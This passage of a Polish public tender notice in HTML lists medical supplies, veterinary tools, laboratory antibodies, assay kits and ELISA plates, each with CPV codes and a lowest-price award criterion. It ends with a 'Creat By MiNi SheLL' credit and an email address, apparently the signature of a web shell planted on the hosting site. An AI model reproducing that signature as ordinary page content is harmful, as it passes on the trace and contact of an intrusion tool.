48.	Plaster w rolce 10 mm, długość minimalna 4,5 m		10 sztuk
49.	Plaster w rolce 50 mm, długość minimalna 4,5m		10 sztuk
50.	Probówki  do krwi powlekane EDTA 2 ml 		1200 sztuk

51.	Probówki do hematologii na 1 ml krwi, z rozpylonym EDTA-K2, 
             z nalepką 		                                       500 sztuk
52.	Probówki do pozyskiwania surowicy o poj. 11 ml, z granulatem   
             separującym i przyspieszaczem wykrzepiania krwi 	400 sztuk
53.	Proszek do czyszczenia narzędzi chirurgicznych 5 kg w opakowaniu		                                                                            1 opakowanie
55.	Ręcznik celulozowy w rolce szerokość 21cm X 150 m x 19,0 cm średnica 		1 rolka
56.	Rękaw foliowo - papierowy do sterylizacji 20 cm x 200 m	1 sztuka
57.	Rękawiczki niejałowe L opakowanie po 100 sztuk	10 opakowań
58.	Rękawiczki niejałowe M opakowanie po 100 sztuk	5 opakowań
59.	Rękawiczki niejałowe S opakowanie po 100 sztuk	15 opakowań
60.	Rękawiczki sterylne 6,5		50 par
61.	Rękawiczki sterylne 7,5		50 par
62.	Rękawiczki sterylne 8		50 par
63.	Septanol spray płyn do dezynfekcji powierzchni  po  1000 ml	5 sztuk
64.	Serweta chirurgiczna sterylna jednorazowa 40-50 x 40-50 cm      24 sztuk
65.	Serweta chirurgiczna sterylna jednorazowa 80-100x80-100 cm    24 sztuk
66.	 płyn do dezynfekcji rąk po  500 ml		                        5 sztuk
67.	Skórne testy alergiczne (białko i żółtko jaja kurzego) zestaw- 
             ampułka po 5 ml		                                                1 zestaw
68.	Strzykawki insulinowe 		                                   800 sztuk
69.	Szczotka chirurgiczna do mycia rąk z tworzywa sztucznego       2 sztuki
70.	Termometr elektroniczny		                                   6 sztuk
71.	Ubranie lekarskie dwu- częściowe , rozmiar L (duży)	       2 komplety
72.	Ubranie lekekarskie dwu-częściowe, rozmiar M (średni)	       4 komplety
73.	Żel do USG  po 500 ml		                                 10 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> dostawa sprzętu weterynaryjnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Łańcuszek do ucisku naczyń krwionośnych przy pobieraniu krwi u bydła 1 sztuka 
2.Maszynka do strzyżenia zwierząt dwubiegowa, min. 45 W, 
   50-60 Hz z wymiennymi ostrzami 		                                    2 sztuki
3.Mikrotransponder (chip ) do znakowania zwierząt		          36 sztuk
4.Ostrze do maszynki typu Oster Golden A 5, grubość 40		          3 sztuki
5.Ostrze do maszynki typu Oster Golden A 5, grubość 10		          1 sztuka 
6.Sonda z wlewnikiem dla cieląt		                                    4 sztuk
7.Trokar śrubowy do punkcji żwacza		                                    3 sztuki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> dostawa przeciwciał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zestaw- przeciwciała monoklonalne do oznaczania mysich cytokin produkujących przez limfocyty Th1/Th2, standard 1 zestaw na 100 oznaczeń 	2 zestawy
2.Zestaw- przeciwciała monoklonalne do oznaczania mysich cytokin produkujacych przez limfocyty Th1/Th2,  1 zestaw na 100 oznaczeń		2 zestawy
3.Cielęca surowica płodowa (FCS) w opakowaniu po 100 ml	5 opakowań
4.Oczyszczone IgG kurze typu Jackson Immuno Research 
lub równoważne                                                                    2 opakowania
5.przeciwciała monoklonalne podwójnie barwione fluoresceiną i fykoerytryną do oznaczania mysich limfocytów B (CD19) i limfocytów T (CD3), (ampułka 1ml na 100 testów)		                                                                  3 ampułki
6.przeciwciała monoklonalne podwójnie barwione fluoresceiną i fykoerytryną do oznaczania mysich limfocytów T o funkcji wspomagajacej  (CD4) i limfocytów T 
o funkcji cytotoksyczno-supresyjnej (CD8) (1 ampułka po 1ml na 100 testów) 
                                                                                                   2 ampułki
7.zestaw do kolorymetrycznego oznaczania glutationu typu Cayman do badań u kur lub równoważne		                                                           2 zestawy
8.Zestaw do kolorymetrycznego oznaczania katalazy typu Cayman 
lub równoważne		                                                            2 zestawy
9.Zestaw do oznaczania hydroperoksydazy lipidowej  (LPO) Assay Kit typu Cayman lub równoważne		                                                       2 opakowania
10.Zestaw przeciwciał do oznaczania TNF alfa u myszy  ELISA kit do badań u kur,  typu Invitrogen na 96 oznaczeń lub równoważne 		       2 zestawy
11.Zestaw przeciwciał do oznaczania iterleukiny 1 beta u myszy  do badań u kur,   typu Invitrogen  na  96 oznaczeń lub równoważne		        2 zestawy
12.Zestaw-kit do oznaczania (IgG FITC) immunoglobulin jaja kurzego        1 zestaw
13.Zestaw-kit do oznaczania mysiej interleukiny 1beta metodą ELISA	        2 zestawy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.63.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> dostawa drobnego sprzętu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Folia poliestrowa, przezroczysta do zaklejania płytek do testów ELISA 
na 96 dołków 		                                                            400 sztuk
2.Płytki polistyrenowe, 96 dołkowe, bezbarwne, z płaskim dnem typu F 
w paskach  MaxiSorp, w ramkach.  		                                    70 sztuk
3.Płytki titracyjne F z celkami z dnem płaskim o poj. 360?l, z polistyrenu, 
sterylne o dużej zdolności wiazania wszystkich grup związków	           20 sztuk
4.Płytki titracyjne 96 dołkowe, sterylne płaskodenne z nakrywką, 
do hodowli komórkowych		                                               200 sztuk
5.Pojemnik sterylny z nakrywką do hodowli komórkowych 4 dołkowy 
o wymiarach 128x86 mm, pow. 1 dołka 21,8 cm2, poj. 5 ml	         100 sztuk
6.Pokrywki do płytek titracyjnych, z PS, sterylne, 96 dołkowe, typu U      200 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com